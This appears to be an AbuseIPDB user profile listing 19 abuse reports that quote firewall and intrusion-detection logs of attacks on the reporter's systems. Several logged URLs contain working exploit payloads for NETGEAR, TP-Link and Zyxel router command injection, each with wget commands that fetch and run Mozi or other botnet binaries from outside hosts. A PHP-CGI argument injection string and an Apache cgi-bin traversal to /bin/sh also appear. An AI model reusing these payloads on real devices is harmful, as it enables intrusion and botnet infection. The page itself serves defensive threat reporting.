GT Line - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User GT Line joined AbuseIPDB in May 2024 and has reported 22 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇬🇧 5.188.206.254	17 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-17 time=01:27:12 (EEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-17 time=01:27:12 (EEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=5.188.206.254 user="Huxley" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force
🇱🇹 91.224.92.130	17 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-17 time=13:52:55 (EEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-17 time=13:52:55 (EEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=91.224.92.130 user="Moroz" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force
🇸🇬 47.84.93.37	10 Sep 2024	The following intrusion was observed: Apache.HTTP.Server.cgi-bin.Path.Traversal. date=2024-09-10 ... show more The following intrusion was observed: Apache.HTTP.Server.cgi-bin.Path.Traversal. date=2024-09-10 time=02:14:03 (CEST) srcip=47.84.93.37 srccountry="Singapore" service="HTTP" attack="Apache.HTTP.Server.cgi-bin.Path.Traversal" srcport=53496 dstport=80 url="/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" agent="Custom-AsyncHttpClient" httpmethod="POST" direction="outgoing" ref="http://www.fortinet.com/ids/VID50825" msg="apache: Apache.HTTP.Server.cgi-bin.Path.Traversal" show less	Hacking
🇮🇳 117.235.124.178	10 Sep 2024	The following intrusion was observed: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution. ... show more The following intrusion was observed: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution. date=2024-09-10 time=03:03:46 (CEST) srcip=117.235.124.178 srccountry="India" service="HTTP" attack="NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution" srcport=35476 dstport=80 url="/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.235.124.178:42097/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1" httpmethod="GET" direction="outgoing" ref="http://www.fortinet.com/ids/VID44738" msg="applications3: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution" show less	Hacking
🇩🇪 207.154.208.215	10 Sep 2024	The following intrusion was observed: "Nmap.Script.Scanner". date=2024-09-10 time=08:43:33 (EEST ... show more The following intrusion was observed: "Nmap.Script.Scanner". date=2024-09-10 time=08:43:33 (EEST) srcip=207.154.208.215 srccountry="Germany" service="SSL" attack="Nmap.Script.Scanner" srcport=7485 dstport=80 url="/" direction="outgoing" ref="http://www.fortinet.com/ids/VID45360" msg="tools: Nmap.Script.Scanner," show less	Hacking
🇸🇬 128.199.193.75	10 Sep 2024	The following intrusion was observed: "SystemBC.Botnet". date=2024-09-10 time=11:11:35 (EEST) s ... show more The following intrusion was observed: "SystemBC.Botnet". date=2024-09-10 time=11:11:35 (EEST) srcip=128.199.193.75 srccountry="Singapore" service="HTTP" attack="SystemBC.Botnet" srcport=60480 dstport=80 url="/systembc/password.php" direction="outgoing" ref="http://www.fortinet.com/ids/VID49827" msg="backdoor: SystemBC.Botnet," show less	Hacking
🇨🇭 141.255.160.234	10 Sep 2024	The following intrusion was observed: "TP-Link.Archer.AX21.luci.stok.Command.Injection". date=202 ... show more The following intrusion was observed: "TP-Link.Archer.AX21.luci.stok.Command.Injection". date=2024-09-10 time=10:04:30 (EEST) srcip=141.255.160.234 srccountry="Switzerland" service="HTTP" attack="TP-Link.Archer.AX21.luci.stok.Command.Injection" srcport=33896 dstport=80 url="/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F45.202.35.88%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink+tplink%3B+rm+-rf+tplink%60)" direction="outgoing" ref="http://www.fortinet.com/ids/VID52742" msg="applications3: TP-Link.Archer.AX21.luci.stok.Command.Injection," show less	Hacking
🇺🇸 98.142.142.192	10 Sep 2024	The following intrusion was observed: "Apache.HTTP.Server.cgi-bin.Path.Traversal". date=2024-09-1 ... show more The following intrusion was observed: "Apache.HTTP.Server.cgi-bin.Path.Traversal". date=2024-09-10 time=09:33:47 (EEST) srcip=98.142.142.192 srccountry="United States" service="HTTP" attack="Apache.HTTP.Server.cgi-bin.Path.Traversal" srcport=33894 dstport=80 url="/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" direction="outgoing" ref="http://www.fortinet.com/ids/VID50825" msg="apache: Apache.HTTP.Server.cgi-bin.Path.Traversal," show less	Hacking
🇳🇮 179.60.149.210	10 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-10 time=05:39:24 (EEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-10 time=05:39:24 (EEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=179.60.149.210 user="canon" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force
🇺🇸 172.245.188.79	09 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=23:53:23 (CEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=23:53:23 (CEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=172.245.188.79 user="admin" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force
🇺🇸 142.147.89.233	09 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=14:09:54 (CEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=14:09:54 (CEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=142.147.89.233 user="ivan" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force
🇩🇪 37.114.63.58	06 Sep 2024	The following intrusion was observed: "PHP.CGI.Argument.Injection" date=2024-09-06 time=08:31:42 ... show more The following intrusion was observed: "PHP.CGI.Argument.Injection" date=2024-09-06 time=08:31:42 (EEST) srcip=37.114.63.58 srccountry="Germany" service="HTTP" attack="PHP.CGI.Argument.Injection" srcport=42310 dstport=80 url="/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input" direction="outgoing" ref="http://www.fortinet.com/ids/VID31752" msg="web_server: PHP.CGI.Argument.Injection," show less	Hacking Web App Attack
🇺🇸 38.170.173.152	06 Sep 2024	The following intrusion was observed: WordPress.REST.API.Username.Enumeration.Information.Disclosure ... show more The following intrusion was observed: WordPress.REST.API.Username.Enumeration.Information.Disclosure date=2024-09-06 time=08:06:36 (CEST) srcip=38.170.173.152 srccountry="United States" service="HTTP" attack="WordPress.REST.API.Username.Enumeration.Information.Disclosure" srcport=36747 dstport=80 url="/wp-json/wp/v2/users" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" httpmethod="GET" direction="outgoing" ref="http://www.fortinet.com/ids/VID48072" msg="web_app3: WordPress.REST.API.Username.Enumeration.Information.Disclosure" show less	Hacking Web App Attack
🇨🇳 117.72.79.140	05 Sep 2024	The following intrusion was observed: Zyxel.zhttpd.Webserver.Command.Injection date=2024-09-04 t ... show more The following intrusion was observed: Zyxel.zhttpd.Webserver.Command.Injection date=2024-09-04 time=18:18:12 (CEST) srcip=117.72.79.140 srccountry="China" service="HTTP" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=55616 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://5.59.248.92/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" ref="http://www.fortinet.com/ids/VID53200" msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" show less	Hacking
🇺🇸 67.227.173.42	05 Sep 2024	The following intrusion was observed: "Masscan.Scanner" date=2024-09-05 time=05:27:46 (CEST) sr ... show more The following intrusion was observed: "Masscan.Scanner" date=2024-09-05 time=05:27:46 (CEST) srcip=67.227.173.42 srccountry="United States" service="HTTP" attack="Masscan.Scanner" srcport=61001 dstport=80 url="/" direction="outgoing" ref="http://www.fortinet.com/ids/VID44778" msg="applications3: Masscan.Scanner," show less	Port Scan
🇮🇳 117.208.218.151	05 Sep 2024	The following intrusion was observed: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution. ... show more The following intrusion was observed: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution. date=2024-09-05 time=04:50:45 (CEST) srcip=117.208.218.151 srccountry="India" service="HTTP" attack="NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution" srcport=51084 dstport=80 url="/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.208.218.151:60168/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1" httpmethod="GET" direction="outgoing" ref="http://www.fortinet.com/ids/VID44738" msg="applications3: NETGEAR.DGN1000.CGI.Unauthenticated.Remote.Code.Execution" show less	Hacking
🇮🇳 59.183.42.199	05 Sep 2024	The following intrusion was observed: "Multiple.Routers.GPON.formLogin.Remote.Command.Injection" ... show more The following intrusion was observed: "Multiple.Routers.GPON.formLogin.Remote.Command.Injection" date=2024-09-05 time=08:38:36 (CEST) srcip=59.183.42.199 srccountry="India" service="HTTP" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=44754 dstport=80 url="/boaform/admin/formLogin?username=admin&psd=admin" direction="outgoing" ref="http://www.fortinet.com/ids/VID52588" msg="applications3: Multiple.Routers.GPON.formLogin.Remote.Command.Injection," show less	Hacking
🇦🇺 170.64.159.113	05 Sep 2024	The following intrusion was observed: SystemBC.Botnet date=2024-09-05 time=10:39:37 (CEST) srci ... show more The following intrusion was observed: SystemBC.Botnet date=2024-09-05 time=10:39:37 (CEST) srcip=170.64.159.113 srccountry="Australia" service="HTTP" attack="SystemBC.Botnet" srcport=51270 dstport=80 url="/systembc/password.php" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" httpmethod="GET" direction="outgoing" ref="http://www.fortinet.com/ids/VID49827" msg="backdoor: SystemBC.Botnet" show less	Hacking
🇺🇸 45.134.140.132	05 Sep 2024	Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=09:18:57 (CEST) logdesc="SSL ... show more Multiple Unauthorized SSL VPN Login Attempts date=2024-09-05 time=09:18:57 (CEST) logdesc="SSL VPN login fail" action="ssl-login-fail" tunneltype="ssl-web" tunnelid=0 remip=45.134.140.132 user="postgres" reason="sslvpn_login_permission_denied" msg="SSL user failed to logged in" show less	VPN IP Brute-Force